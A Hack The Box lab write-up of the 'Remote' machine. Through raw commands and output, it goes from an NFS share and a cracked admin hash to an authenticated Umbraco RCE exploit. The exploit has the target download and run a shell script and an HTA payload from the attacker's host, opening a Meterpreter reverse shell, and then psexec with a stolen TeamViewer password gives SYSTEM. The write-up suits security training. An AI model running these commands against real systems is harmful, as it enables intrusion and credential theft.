DaddyBigFish
Online

Remote

Sun, 15 September 2024
Platform: Hack The Box

Nmap scan report for 10.129.230.172
Host is up (0.058s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 59m58s
| smb2-time: 
|   date: 2024-09-14T14:35:50
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
curl 10.129.230.172:80/people | grep '<h3 class="employee-grid__item__name">' | awk '{print $2 " " $3}'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  6739  100  6739    0     0  50960      0 --:--:-- --:--:-- --:--:-- 51053
class="employee-grid__item__name">Jan Skovgaard</h3>
class="employee-grid__item__name">Matt Brailsford</h3>
class="employee-grid__item__name">Lee Kelleher</h3>
class="employee-grid__item__name">Jeavon Leopold</h3>
class="employee-grid__item__name">Jeroen Breuer</h3>


Jan Skovgaard
Matt Brailsford
Lee Kelleher
Jeavon Leopold
Jeroen Breuer
showmount -e remote.htb          
Export list for remote.htb:
/site_backups (everyone)
[Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 56ms]
http://remote.htb/install
| --> | /umbraco/

[Status: 200, Size: 4040, Words: 710, Lines: 96, Duration: 380ms]
http://remote.htb/umbraco
searchsploit umbraco

------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                  |  Path
------------------------------------------------------------------------------------------------ ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                             | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                      | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                      | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal                                                         | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                      | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF                                                                | aspx/webapps/50462.txt
------------------------------------------------------------------------------------------------ ---------------------------------
showmount -e remote.htb          
Export list for remote.htb:
/site_backups (everyone)

sudo mount.nfs remote.htb:site_backups -w /mnt
cd /mnt
grep -rw "username" .                         
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:12:13,455 [P4408/D19/T40] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:15:24,558 [P4408/D20/T16] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:16:55,036 [P4408/D20/T41] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:21:36,660 [P4408/D20/T37] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Umbracoadmin123!! from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:21:42,642 [P4408/D20/T16] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:31,767 [P4408/D20/T45] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:38,043 [P4408/D20/T41] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:52,835 [P4408/D20/T45] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:28:28,366 [P4408/D20/T6] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:28:54,043 [P4408/D15/T45] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:32:45,046 [P4408/D18/T39] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:32:53,831 [P4408/D18/T6] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
Login attempt succeeded for username admin@htb.local 
Login attempt succeeded for username ssmith@htb.local 
Login attempt failed for username Umbracoadmin123!!
find . -type f -exec strings {} + | grep "admin"
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
find . -type f -exec strings {} + | grep "ssmith"
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
echo 'b8be16afba8c314ad33d812f22a04991b90e2aaa' | johnx rockyou

Hash: b8be16afba8c314ad33d812f22a04991b90e2aaa
Wordlist: rockyou
Format: raw-sha1
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 512/512 AVX512BW 16x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese   (?)     
1g 0:00:00:00 DONE (2024-09-15 00:06) 2.631g/s 25849Kp/s 25849Kc/s 25849KC/s baconbarnett..baconand21
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.
http://remote.htb/umbraco

login:
admin@htb.local:baconandcheese
Umbraco version 7.12.4

------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                  |  Path
------------------------------------------------------------------------------------------------ ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                             | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                      | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                      | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal                                                         | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                      | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF                                                                | aspx/webapps/50462.txt
------------------------------------------------------------------------------------------------ ---------------------------------
python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c curl -a "10.10.16.4:8088/shell.bat -o C:/programdata/shell.bat"
python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c "C:/programdata/shell.bat"
cd C:\Users\Public\Desktop>
type user.txt
e4df2964f254745b546da66ccd7d6381
 Directory of C:\Users\Public\Desktop

01/09/2024  10:48 AM    <DIR>          .
01/09/2024  10:48 AM    <DIR>          ..
09/14/2024  09:23 PM               971 TeamViewer 7.lnk
09/14/2024  07:03 PM                34 user.txt
               2 File(s)          1,005 bytes
               2 Dir(s)  13,339,992,064 bytes free
msf6 exploit(multi/handler) > windows/misc/hta_server
msf6 exploit(windows/misc/hta_server) > set srvhost 10.10.16.4
srvhost => 10.10.16.4
msf6 exploit(windows/misc/hta_server) > set lhost 10.10.16.4
lhost => 10.10.16.4
msf6 exploit(windows/misc/hta_server) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/hta_server) > 
[*] Started reverse TCP handler on 10.10.16.4:4444 
[*] Using URL: http://10.10.16.4:8080/jE54f2zCU.hta
[*] Server started.
python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c mshta.exe -a "http://10.10.16.4:8080/jE54f2zCU.hta"

[*] Sending stage (176198 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.10.10.180:49729) at 2024-09-15 04:18:31 +0100
[*] 10.10.16.4       hta_server - Delivering Payload
msf6 exploit(windows/misc/hta_server) > sessions

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter x86/windows  IIS APPPOOL\DefaultAppPool @ REMOTE  10.10.16.4:4444 -> 10.10.10.180:49729 (10.10.10.180)

msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run post/windows/gather/credentials/teamviewer_passwords

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
impacket-psexec Administrator@remote.htb cmd.exe      
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Requesting shares on remote.htb.....
[*] Found writable share ADMIN$
[*] Uploading file aDJBVBDA.exe
[*] Opening SVCManager on remote.htb.....
[*] Creating service EjrD on remote.htb.....
[*] Starting service EjrD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
cd C:\Users\Administrator\Desktop

type root.txt
031af16b2bc6d902d89dcb0602c65ee6